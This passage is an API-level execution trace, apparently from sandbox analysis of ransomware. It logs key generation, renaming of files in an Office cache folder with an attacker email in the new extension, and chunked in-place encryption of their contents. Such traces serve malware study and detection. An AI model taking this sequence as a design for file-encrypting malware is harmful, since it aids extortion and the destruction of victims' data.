[0151.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0151.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0151.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0151.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385b60 | out: hHeap=0x2e0000) returned 1 [0151.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385ab8 | out: hHeap=0x2e0000) returned 1 [0151.654] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385ab8 [0151.654] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0151.654] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0151.654] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0151.654] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0151.654] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1 [0151.655] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73 [0151.655] GetProcessHeap () returned 0x2e0000 [0151.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31d0110 [0151.655] lstrcpyW (in: lpString1=0x31d0110, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" [0151.655] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0151.655] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0151.657] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0151.657] GetProcessHeap () returned 0x2e0000 [0151.657] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0110 | out: hHeap=0x2e0000) returned 1 [0151.657] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1377656) returned 1 [0151.657] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x150578 [0151.657] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0151.657] GetProcessHeap () returned 0x2e0000 [0151.657] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0151.657] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0151.657] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0151.661] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0151.662] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.662] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x150578) returned 0x33d0020 [0151.662] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x150578) returned 0x3530020 [0151.662] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.662] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x150578, lpOverlapped=0x0) returned 1 [0151.733] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0151.733] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0151.733] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", dwFileAttributes=0x80) returned 1 [0151.734] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 76 [0151.734] GetProcessHeap () returned 0x2e0000 [0151.734] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0151.734] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" [0151.734] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0151.734] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0151.736] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0151.737] GetProcessHeap () returned 0x2e0000 [0151.737] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0151.737] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=162970271) returned 1 [0151.737] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x9b6ba9f [0151.737] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0151.737] GetProcessHeap () returned 0x2e0000 [0151.737] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0151.737] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0151.737] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0151.741] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0151.741] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x33d0020 [0151.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x34e0020 [0151.742] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.742] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.772] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.772] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.772] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.772] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.800] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0151.800] WriteFile (in: hFile=0x4a8, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.802] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.802] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.802] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.802] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.808] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0151.808] WriteFile (in: hFile=0x4a8, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.811] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.811] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.811] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.811] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.832] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0151.832] WriteFile (in: hFile=0x4a8, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.834] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.834] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.834] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.834] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.848] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0151.848] WriteFile (in: hFile=0x4a8, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.850] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.850] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.850] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.850] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.863] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0151.864] WriteFile (in: hFile=0x4a8, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.866] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.866] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.866] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.866] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.880] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0151.880] WriteFile (in: hFile=0x4a8, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0151.882] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.882] WriteFile (in: hFile=0x4a8, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.882] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0151.887] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0020 | out: hHeap=0x2e0000) returned 1 [0151.892] CloseHandle (hObject=0x4a8) returned 1 [0152.235] GetProcessHeap () returned 0x2e0000 [0152.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385a10 | out: hHeap=0x2e0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0152.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385968 [0152.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0152.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0152.236] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0152.236] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0152.236] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", dwFileAttributes=0x80) returned 1 [0152.243] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 77 [0152.243] GetProcessHeap () returned 0x2e0000 [0152.243] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0152.243] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" [0152.243] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0152.243] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0152.245] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0152.246] GetProcessHeap () returned 0x2e0000 [0152.246] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0152.246] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=6421) returned 1 [0152.246] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1915 [0152.246] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0152.246] GetProcessHeap () returned 0x2e0000 [0152.246] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0152.246] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0152.246] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0152.247] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0152.248] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0152.248] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1915) returned 0x3a7410 [0152.248] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1915) returned 0x3a8d30 [0152.248] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.248] ReadFile (in: hFile=0x4a8, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x1915, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x1915, lpOverlapped=0x0) returned 1 [0152.248] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-6421, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.248] WriteFile (in: hFile=0x4a8, lpBuffer=0x3a8d30*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a8d30*, lpNumberOfBytesWritten=0x2acf9c8*=0x1915, lpOverlapped=0x0) returned 1 [0152.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 